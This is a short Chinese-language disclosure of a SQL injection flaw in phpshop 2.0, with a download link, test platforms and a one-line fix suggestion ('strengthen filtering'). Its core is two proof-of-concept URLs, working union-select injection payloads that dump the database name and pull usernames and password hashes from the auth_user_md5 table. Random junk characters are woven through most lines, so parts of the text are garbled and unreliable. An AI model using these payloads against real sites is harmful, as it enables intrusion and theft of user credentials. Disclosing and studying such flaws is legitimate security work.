标题 : phpshop 2.0 SQL Injection Vulnerability
* t+ L! i& ]0 Y/ V" v7 f% O# q' c( `' a7 M9 g0 K
作者 : By onestree
- v$ d5 p: |/ \下载地址 : http://code.google.com/p/phpshop/downloads/list
! ~" c/ \. M& g) i5 i0 o( o测试地址: windows 7 / ubuntu
4 S2 w7 w; G* {& m , G9 A, W2 N. z+ _( l
/ A2 T# X$ q5 X
SQLi p0c:8 h8 n4 R) G! C3 S
5 S- K; F' A% W==================9 B; n" E' E% Q4 B- g8 g8 X
" ?$ r, `4 u7 A4 j* g, [ n+ nhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'7 {% g# i5 C- u- {1 d8 k4 G: D
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
0 }& \6 x/ n o9 |- ~4 z
' Y* d& W7 `9 F# I; Ihttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
. {0 ^! ^1 |6 b$ c! ]2 {5 o6 F8 p5 X
修复:
: ]! L, @2 `& C5 n加强过滤
* `2 K: X+ @( F
% ~$ r1 A: I8 c5 }5 p' U v }; i, g0 c' }2 L2 g
|